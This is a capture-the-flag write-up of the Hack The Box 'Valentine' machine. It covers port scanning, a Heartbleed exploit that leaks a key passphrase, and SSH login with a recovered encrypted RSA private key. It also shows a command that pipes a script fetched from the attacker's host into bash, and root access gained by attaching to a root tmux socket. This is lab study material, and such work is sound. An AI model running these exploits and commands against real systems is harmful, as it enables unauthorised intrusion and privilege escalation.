valentine
Introduction:
Recon
eneloop@kinetic:…/hackthebox/valentine/data$ sudo nmap -sS -sC -sV -O -T4 -Pn -oN nmap.valentine.txt 10.10.10.79 [sudo] password for eneloop: Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 20:20 EST Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 20:20 (0:00:06 remaining) Nmap scan report for 10.10.10.79 Host is up (0.015s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA) | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA) |_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn’t have a title (text/html). 443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn’t have a title (text/html). | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US | Not valid before: 2018-02-06T00:45:25 |_Not valid after: 2019-02-06T00:45:25 |_ssl-date: 2021-02-14T01:29:37+00:00; +8m57s from scanner time. No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/13%OT=22%CT=1%CU=31751%PV=Y%DS=2%DC=I%G=Y%TM=60287AE OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=8)OPS OS:(O1=M54DST11NW4%O2=M54DST11NW4%O3=M54DNNT11NW4%O4=M54DST11NW4%O5=M54DST1 OS:1NW4%O6=M54DST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)ECN OS:(R=Y%DF=Y%T=40%W=3908%O=M54DNNSNW4%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M54DST11NW4%RD= OS:0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S= OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R= OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%R OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_clock-skew: 8m56s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.01 seconds eneloop@kinetic:…/hackthebox/valentine/data$
Enumeration
(py3) eneloop@kinetic:/oscp/tools/threader3000$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.79/ -k
Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: https://10.10.10.79/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s
2021/02/13 20:26:43 Starting gobuster
/index (Status: 200) /dev (Status: 301) /encode (Status: 200) /decode (Status: 200) /omg (Status: 200) /server-status (Status: 403)
2021/02/13 20:32:48 Finished
(py3) eneloop@kinetic:/oscp/tools/threader3000$
eneloop@kinetic:…/valentine/data/payload$ cat hype_key | xxd -r -p —–BEGIN RSA PRIVATE KEY—– Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 —–END RSA PRIVATE KEY—–
Lets examine the SSL for heartbleed vulnerability as the machine name and website is screaming “heartbleed” anyway!
Search heartbleed
https://gist.github.com/eelsivart/10174134
Exploitation
1(py2) eneloop@kinetic:.../hackthebox/valentine/data$ python ./heartbleed_cve_2014-0160.py -v valentine.htb
2
3defribulator v1.16
4A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
5
6##################################################################
7Connecting to: valentine.htb:443, 1 times
8Sending Client Hello for TLSv1.0
9Waiting for Server Hello...
10Received message: type = 22, version = 0x301, length = 66
11Received message: type = 22, version = 0x301, length = 885
12Received message: type = 22, version = 0x301, length = 331
13Received message: type = 22, version = 0x301, length = 4
14Received Server Hello for TLSv1.0
15
16Sending heartbeat request...
17Received message: type = 24, version = 0x301, length = 16384
18Received heartbeat response...
19
20WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
21Please wait... connection attempt 1 of 1
22##################################################################
23
24[email protected][...r....+..H...9...
25....w.3....f...
26...!.9.8.........5...............
27.........3.2.....E.D...../...A.................................I.........
28...........
29...................................#.......0.0.1/decode.php
30Content-Type: application/x-www-form-urlencoded
31Content-Length: 42
32
33$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==...$Qi...n........\CE4F92DE4C2A60EE1395E4084FAAAFE7E26743690837915A5FF33FC7F729700527D7B31BC43569FC8F0CFC3E468C691">mac-intel</device-id>
34<mac-address-list>
35<mac-address>2d:e9:14:14:29:9a</mac-address></mac-address-list>
36<group-select>VPN</group-select>
37<group-access>https://10.10.10.79:443</group-access>
38</config-auth>|...!o.2...>{...MR..
39
40(py2) eneloop@kinetic:.../hackthebox/valentine/data$
1Your input:
2
3aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
4
5Your encoded input:
6
7heartbleedbelievethehype
eneloop@kinetic:…/valentine/data/payload$ cat hype_key | xxd -r -p > /dev/shm/id_rsa_hype (py2) eneloop@kinetic:…/valentine/data/payload$ chmod 400 /dev/shm/id_rsa_hype (py2) eneloop@kinetic:…/valentine/data/payload$ ssh -i /dev/shm/id_rsa_hype [email protected] Enter passphrase for key ‘/dev/shm/id_rsa_hype’: Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
- Documentation: https://help.ubuntu.com/
New release ‘14.04.5 LTS’ available. Run ‘do-release-upgrade’ to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3 hype@Valentine:~$
Post-exploit/PrivEsc
1hype@Valentine:~$ curl 10.10.14.38:8000/linpeas.sh | bash
2 % Total % Received % Xferd Average Speed Time Time Time Current
3 Dload Upload Total Spent Left Speed
4 46 305k 46 143k 0 0 72610 0 0:00:04 0:00:02 0:00:02 73107 Starting linpeas. Caching Writable Folders...
5
Important Findings -
- Older linus version - OS: Linux version 3.2.0-23-generic
- gcc is installed
- We have a root session running tmux root 1018 0.0 0.1 26416 1668 ? Ss Feb14 0:15 /usr/bin/tmux -S /.devs/dev_sess
- /home/hype/.ssh/id_rsa
- [+] Searching root files in home dirs (limit 30) /home/ /home/hype/.tmux.conf
User Flag
hype@Valentine:~$ cd hype@Valentine:~$ find ./ -name user.txt ./Desktop/user.txt hype@Valentine:~$ cat ./Desktop/user.txt e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX50 hype@Valentine:~$
hype@Valentine:~$ cat /home/hype/.tmux.conf run-shell ~/.clone/path/resurrect.tmux hype@Valentine:~$ ls -l /home/hype/.tmux.conf -rw-r–r– 1 root root 39 Dec 13 2017 /home/hype/.tmux.conf
hype@Valentine:~$ find / -name ‘.devs’ 2>/dev/null /.devs hype@Valentine:~$ cd .devs -bash: cd: .devs: No such file or directory hype@Valentine:~$ cd /.devs hype@Valentine:/.devs$ ls -l total 0 srw-rw—- 1 root hype 0 Feb 14 15:27 dev_sess hype@Valentine:/.devs$
hype@Valentine:/.devs$ ps -ef | grep tmux root 1018 1 0 Feb14 ? 00:00:15 /usr/bin/tmux -S /.devs/dev_sess hype 24822 4678 0 06:08 pts/0 00:00:00 grep –color=auto tmux hype@Valentine:/.devs$ /usr/bin/tmux -S /.devs/dev_sess
This will attach you to the root session.
root@Valentine:/home/hype# root@Valentine:/home/hype# cd root@Valentine:~# ls -l root.txt -rw-r–r– 1 root root 33 Dec 13 2017 root.txt root@Valentine:~#
Notes: